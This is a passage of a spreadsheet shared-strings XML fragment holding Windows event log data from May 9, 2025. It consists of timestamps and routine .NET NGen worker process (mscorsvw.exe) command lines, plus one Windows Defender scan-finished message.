    <t>May 9, 2025 @ 13:43:32.633</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:32.874</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 30c -InterruptEvent 0 -NGENProcess 2f4 -Pipe 340 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:34.400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:34.787</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 2d8 -Pipe 3a8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:34.802</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 394 -InterruptEvent 0 -NGENProcess 224 -Pipe 374 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:40.367</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:40.765</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 0 -NGENProcess 390 -Pipe 2e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 288 -InterruptEvent 0 -NGENProcess 398 -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:43.046</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:46.394</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b8 -InterruptEvent 0 -NGENProcess 3b4 -Pipe 3ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:47.857</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 3d4 -Pipe 3c8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:52.181</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:52.574</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:52.633</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a8 -InterruptEvent 0 -NGENProcess 3b8 -Pipe 3dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:52.634</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3f4 -InterruptEvent 0 -NGENProcess 32c -Pipe 3f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:56.909</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:57.309</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 0 -NGENProcess 33c -Pipe 3e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:43:59.058</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 0 -NGENProcess 3e4 -Pipe 3cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:05.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:05.627</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3d4 -InterruptEvent 0 -NGENProcess 3f8 -Pipe 33c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:07.156</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:08.410</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 370 -InterruptEvent 0 -NGENProcess 2d8 -Pipe 3fc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:08.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:09.054</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:10.339</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:10.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:13.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:13.651</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:20.498</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:20.840</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 0 -NGENProcess 394 -Pipe 3d4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:23.463</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 3b8 -Pipe 3f4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:25.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:26.076</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 310 -Pipe 3a8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:26.093</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 384 -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:26.097</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 0 -NGENProcess 39c -Pipe 388 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:27.412</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 36c -InterruptEvent 0 -NGENProcess 39c -Pipe 3c0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:27.413</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 2ec -Pipe 39c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:27.440</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 3bc -Pipe 36c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:29.376</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 0 -NGENProcess 320 -Pipe 3d0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:30.345</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:30.524</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 310 -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:30.525</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 380 -InterruptEvent 0 -NGENProcess 2e8 -Pipe 3e4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:31.506</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:31.618</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:31.710</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 358 -Pipe 3bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:31.939</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 3c4 -Pipe 3b8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:32.713</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:32.714</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:32.861</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 304 -InterruptEvent 0 -NGENProcess 3ec -Pipe 224 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:32.886</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 2f8 -Pipe 3a4 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 310 -Pipe 3f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:34.486</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 2f8 -Pipe 304 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:34.770</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:37.399</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 380 -Pipe 358 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:37.406</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3cc -InterruptEvent 0 -NGENProcess 390 -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:37.412</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3e8 -InterruptEvent 0 -NGENProcess 3dc -Pipe 32c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:38.555</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:38.641</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3b0 -InterruptEvent 0 -NGENProcess 394 -Pipe 2d8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:38.656</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3cc -InterruptEvent 0 -NGENProcess 368 -Pipe 37c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:38.760</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:39.632</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:39.744</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ec -InterruptEvent 0 -NGENProcess 384 -Pipe 394 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:39.754</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 310 -Pipe 370 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:40.805</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:40.970</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 310 -Pipe 2e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:40.980</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 0 -NGENProcess 3ac -Pipe 310 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:42.633</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:42.897</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 3ac -Pipe 2f8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:42.906</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 380 -InterruptEvent 0 -NGENProcess 3c4 -Pipe 3e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:42.920</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3c4 -InterruptEvent 0 -NGENProcess 390 -Pipe 380 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:44.029</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 384 -Pipe 3cc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:44.053</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 3dc -Pipe 390 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:45.877</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 40c -InterruptEvent 0 -NGENProcess 3b0 -Pipe 2ec -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:46.902</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 418 -InterruptEvent 0 -NGENProcess 3b0 -Pipe 424 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:49.462</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 438 -InterruptEvent 0 -NGENProcess 444 -Pipe 430 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:49.470</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 440 -InterruptEvent 0 -NGENProcess 3dc -Pipe 434 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:49.477</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 41c -InterruptEvent 0 -NGENProcess 384 -Pipe 3dc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:49.490</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 438 -InterruptEvent 0 -NGENProcess 3b0 -Pipe 428 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:50.551</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 43c -InterruptEvent 0 -NGENProcess 384 -Pipe 404 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:50.562</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 3e8 -Pipe 420 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:50.615</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 454 -InterruptEvent 0 -NGENProcess 414 -Pipe 440 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:50.617</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 44c -InterruptEvent 0 -NGENProcess 464 -Pipe 454 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 448 -InterruptEvent 0 -NGENProcess 46c -Pipe 444 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:50.618</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 450 -InterruptEvent 0 -NGENProcess 47c -Pipe 45c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:51.781</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 450 -InterruptEvent 0 -NGENProcess 368 -Pipe 40c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 3ac -InterruptEvent 0 -NGENProcess 410 -Pipe 448 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:51.782</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 408 -InterruptEvent 0 -NGENProcess 414 -Pipe 368 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:51.791</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 480 -InterruptEvent 0 -NGENProcess 410 -Pipe 48c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:53.010</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 410 -InterruptEvent 0 -NGENProcess 3c4 -Pipe 480 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:53.344</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 44c -InterruptEvent 0 -NGENProcess 3c4 -Pipe 414 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:53.382</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 43c -InterruptEvent 0 -NGENProcess 3b0 -Pipe 438 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 49c -InterruptEvent 0 -NGENProcess 3e8 -Pipe 450 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:54.341</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 498 -InterruptEvent 0 -NGENProcess 42c -Pipe 47c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:54.355</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 460 -InterruptEvent 0 -NGENProcess 4a8 -Pipe 494 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:44:55.775</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 1f4 -InterruptEvent 0 -NGENProcess 1e4 -Pipe 1f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:02.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:02.140</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:10.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:12.217</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 248 -InterruptEvent 0 -NGENProcess 234 -Pipe 244 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:14.771</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /StopEvent:1428</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:45:14.790</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:20.039</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:20.235</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:20.680</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:21.345</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:28.867</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:47:51.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:20.608</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:21.762</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware scan finished</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:26.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:27.261</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:28.655</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:46.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:48:46.958</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:00.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:00.985</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:12.774</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:19.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:43.028</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:43.833</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:49:48.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:23.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:24.228</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:25.046</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:27.250</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:27.317</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:50:28.670</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:51:26.109</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:51:26.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:51:28.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:51:49.566</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:13.882</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:13.953</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:14.143</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:14.149</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:14.151</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:28.920</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:52:32.405</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:06.749</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:09.696</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:09.733</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:10.535</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:10.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:12.189</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:12.194</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:12.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:26.170</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:26.266</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:27.685</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:27.688</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:36.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:37.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:53:43.217</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:12.034</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:12.751</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:12.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.876</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.919</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.931</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.937</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.938</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.946</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:13.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.948</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.950</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:14.961</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:15.990</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:15.993</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:16.131</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:16.294</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:16.435</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:16.436</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.035</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.091</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.173</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.273</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.352</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.360</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.512</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.526</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:17.688</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.225</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.226</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:56:18.287</t>
  </si>
  <si>
